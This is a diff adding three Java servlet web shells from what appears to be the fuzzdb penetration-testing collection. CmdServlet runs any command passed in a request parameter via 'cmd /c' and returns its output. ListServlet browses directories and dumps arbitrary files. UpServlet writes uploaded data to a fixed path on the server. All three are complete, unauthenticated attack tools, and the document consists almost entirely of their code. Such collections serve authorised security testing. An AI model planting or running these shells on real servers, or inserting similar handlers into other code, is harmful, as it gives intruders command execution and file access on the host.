fzuudb-webshell

fuzzdb-webshell/servlet/CmdServlet.java

@@ -0,0 +1,43 @@
+/*
+ * CmdServlet.java	20/01/2004
+ *
+ * @author The Dark Raver
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.*;
+import javax.servlet.http.*;
+
+
+public class CmdServlet extends HttpServlet {
+
+    public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
+		res.setContentType("text/html");
+
+		PrintWriter out = res.getWriter();
+		out.print("<html><body>");
+		out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
+		out.print("<input type=\"text\" name=\"cmd\">");
+		out.print("<input type=\"submit\" value=\"Send\">");
+		out.print("</form>");
+
+		if(req.getParameter("cmd") != null) {
+	        out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
+	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
+	        DataInputStream procIn = new DataInputStream(p.getInputStream());
+			int c='\0';
+        	while ((c=procIn.read()) != -1) {
+				out.print((char)c);
+				}
+	        }
+
+		out.print("\n<hr></pre>");
+		out.print("</body></html>");
+    }
+
+    public String getServletInfo() {
+		return "CmdServlet 0.1";
+    }
+
+}

fuzzdb-webshell/servlet/ListServlet.java

@@ -0,0 +1,86 @@
+/*
+ * ListServlet.java
+ *
+ * @author Sierra
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.ServletException;
+import javax.servlet.http.*;
+
+public class ListServlet extends HttpServlet
+{
+
+
+    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+        PrintWriter printwriter = res.getWriter();
+		String path = req.getParameter("file");
+
+		printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
+		printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
+		if(req.getParameter("file")==null) path = "c:\\";
+		printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
+
+		File file = new File(path);
+
+		if(file.isDirectory())
+		{
+			String s = new String("Unknown");
+			String s2 = new String("Black");
+			File afile[] = file.listFiles();
+			for(int i = 0; i < afile.length; i++)
+			{
+				String s1 = new String(afile[i].toString());
+				printwriter.write("(");
+				String s3;
+				if(afile[i].isDirectory())
+				{
+					printwriter.write("d");
+					s1 = s1 + "/";
+					s3 = new String("Blue");
+				} else
+				if(afile[i].isFile())
+				{
+					printwriter.write("-");
+					s3 = new String("Green");
+				} else
+				{
+					printwriter.write("?");
+					s3 = new String("Red");
+				}
+				if(afile[i].canRead())
+					printwriter.write("r");
+				else
+					printwriter.write("-");
+				if(afile[i].canWrite())
+					printwriter.write("w");
+				else
+					printwriter.write("-");
+				printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
+			}
+
+			printwriter.write("<hr></FONT></BODY></HTML>");
+		} else
+		if(file.canRead())
+		{
+			FileInputStream fileinputstream = new FileInputStream(file);
+			int j = 0;
+				while(j >= 0)
+				{
+					j = fileinputstream.read();
+					printwriter.write(j);
+				}
+			fileinputstream.close();
+		} else
+		{
+			printwriter.write("Can't Read file<BR>");
+		}
+
+    }
+
+
+    public String getServletInfo() {
+        return "Directory Listing";
+    }
+}

fuzzdb-webshell/servlet/UpServlet.java

@@ -0,0 +1,71 @@
+/*
+ * UpServlet.java	29/04/2005
+ *
+ * @author The Dark Raver
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.*;
+import javax.servlet.http.*;
+
+
+public class UpServlet extends HttpServlet {
+
+    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		res.setContentType("text/html");
+		PrintWriter out = res.getWriter();
+		out.print("<html><body>");
+		out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
+		out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
+		out.print("<input type=\"submit\" value=\"Upload\">");
+		out.print("</form>");
+		out.print("</body></html>");
+	}
+
+
+    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		String tag = new String();
+		int c = '\0';
+		int contador = 0;
+		ServletInputStream in = req.getInputStream();
+        DataInputStream post = new DataInputStream(in);
+
+		PrintWriter out = res.getWriter();
+		res.setContentType("text/html");
+		out.print("<pre>");
+
+		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
+			tag=tag.concat("" + (char)c);
+			contador++;
+			}
+
+		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
+
+		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
+		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
+
+		// (!) Uploaded File Name
+
+		File newfile = new File("c:\\install.log");
+
+		/////////////////////////
+
+		FileOutputStream fileout = new FileOutputStream(newfile);
+
+		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
+			c=post.read();
+			fileout.write((char)c);
+			}
+
+		fileout.close();
+		out.print("<== OK");
+
+    }
+
+
+    public String getServletInfo() {
+		return "UpServlet 0.1";
+    }
+
+}